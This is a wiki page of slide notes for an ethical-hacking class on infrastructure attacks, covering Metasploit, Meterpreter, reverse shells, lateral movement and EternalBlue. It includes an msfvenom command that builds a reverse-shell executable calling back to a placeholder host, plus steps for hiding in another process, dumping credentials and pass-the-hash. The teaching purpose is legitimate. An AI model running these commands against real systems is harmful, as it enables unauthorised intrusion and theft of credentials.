Class 6 ‐ Infrastructure Attacks - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

MetaSploit

MetaSploit Overview

MetaSploit Overview

  • Vulnerability – A weakness in a system that can be exploited
  • Payload – A piece of code that runs on a vulnerable system after it was exploited
  • Exploit – Passing the payload to the vulnerable system

Search Engines

Search Engines

  • CVE Details – Common vulnerabilities and exposures
  • Exploit-DB – An archive that gathers exploits, shell codes, and more
  • CVE List – A catalogue that includes a large number of CVEs

SearchSploit

  • Works with Exploit-DB
  • Preinstalled in Kali Linux
  • Contains new exploits
  • Command: searchsploit [name]

SearchSploit Demonstration

SearchSploit Demonstration

  • The searchsploit command activates the application.
  • To download the script, run: Searchsploit –m [full path]
  • Change the script permissions and run the application.

MetaSploit Module Types

  • Exploit
  • Payloads
  • Auxiliaries
  • Encoders
  • Nops

MetaSploit Modules

  • ? – Displays all MetaSploit commands
  • show options – Displays module settings
  • show info – Displays documentation
  • show targets – Displays vulnerable targets

MetaSploit Module Setup

  • use [name] - Sets the module to be used
  • RHOST [IP] - Sets the remote IP host
  • RPORT [port] - Sets the remote port target
  • LHOST [IP] - Sets the local IP host
  • LPORT [port] - Sets the local port number
  • exploit - Runs the exploit

MetaSploit

MetaSploit

  • A framework for penetration testing.
  • Msfconsole is an integrated interface for MetaSploit.
  • Includes additional modules to extend its capabilities.

MetaSploit Scanning

MetaSploit Scanning

  • Scanning involves running nmap from Msfconsole.
  • Msfconsole has a large variety of scanners.
  • All scans are saved to build the database.

Msfconsole Searching

Msfconsole Searching

  • search option will search in all the modules.
  • use is a generic handler for an exploit.
  • use [name] specifies the module in use.

Reverse Shell

Common Shells

  • Telnet – Network protocol that sends data in plain text
  • Netcat – Tool for network connection
  • SSH – Network protocol that sends encrypted data

Remote Shell Types

  • Bind Shell
    • Attacker connects to the target to gain a remote shell.
  • Reverse Shell
    • Attacker runs a listener.
    • The target connects with a shell.

MetaSploit Shells

MetaSploit Shells

  • Various shells can be created by MetaSploit.
  • Shell types include Bind Shell, Reverse Shell, and HTTP Tunnel Shell.
  • Meterpreter is an extensive terminal-based payload.

Msfvenom

  • MetaSploit tool
  • Combines Msfpayload and Msfencode

Msfvenom Structure

msfvenom -p windows/meterpreter/reverse_tcp LPORT=X LHOST=X.X.X.X -f exe > payload.exe
  1. Using msfvenom to create a payload
  2. -p is the payload flag.
  3. The payload to be used
  4. LPORT is the port.
  5. LHOST is the IP of the listening host
  6. -f is the file format flag.
  7. The output file name
  • Creating a basic payload

Msfvenom Output

Msfvenom Output

  • Reverse Shell

Msfvenom Options

  • ncludes features to embed payloads
  • Verifies correct platform and architecture
  • Can detect a non-encoded or non-obfuscated payload

Remote ConnecAon

  • A payload requires a listener.
  • Configured by running use multi/handler
  • exploit multi/handler configures the listener settings.

Automating Msfconsole

Automating Msfconsole

  • Msfconsole can be used in automated scripts.
  • Create a script using makerc [filename]
  • Scripts can be loaded manually using msfconsole –r [file]

Meterpreter

  • getuid - Gets the name of the current user
  • pwd - Gets the current directory
  • ls/cd - Provides a means of navigation in the file system
  • download [filename] - Downloads a file from the target’s machine to the attacker
  • sessions –I - Chooses the session to be used
  • background - Sends the session to the background

Meterpreter Post Exploitation

  • Enables ongoing exploitation after an attack
  • Executed using run [module]
  • Can migrate to a different process to remain hidden

Protection Against Automated Tools

  • Update
    • Keep everything up to date.
  • Endpoint Security
    • Use antivirus protection.
  • Be Aware
    • Try to detect malicious activity.

Lateral Movement

  • Uses credentials to gain access to another computer.
  • Credentials are often used by several local computer accounts.

Finding the Target

Finding the Target

  • Find out who is where.
    • Check who is logged on the network.
  • Find out who is an admin.
    • Which users have administrative privileges?
  • Find out who belongs to which group.
    • Study group structures in the network.

Lateral Movement Automation

  • BloodHound
    • Used to display collected information.
  • Neo4j
    • Back-end engine used to calculate and manage collected data.

Lateral Movement Process

  • Escalate Permissions
    • Get highest possible privileges.
  • List Members
    • Use permissions to extract session hashes.
  • Dump Credentials
    • Dump the credentials.
  • PTH & PsExec
    • Execute Pass the Hash or PsExec attacks.
  • Repeat
    • Repeat if admin failed to access.

Finding the Target: EternalBlue

  • One of the most common exploits
  • Will work on Windows 7 unpatched SP1
  • Works via a remote shell on the target

EternalBlue Exploit

EternalBlue Exploit

  • Attacker recognizes the target’s OS and version.
  • Attacker loads the module and payload.
  • Attacker executes the attack and gets a remote shell.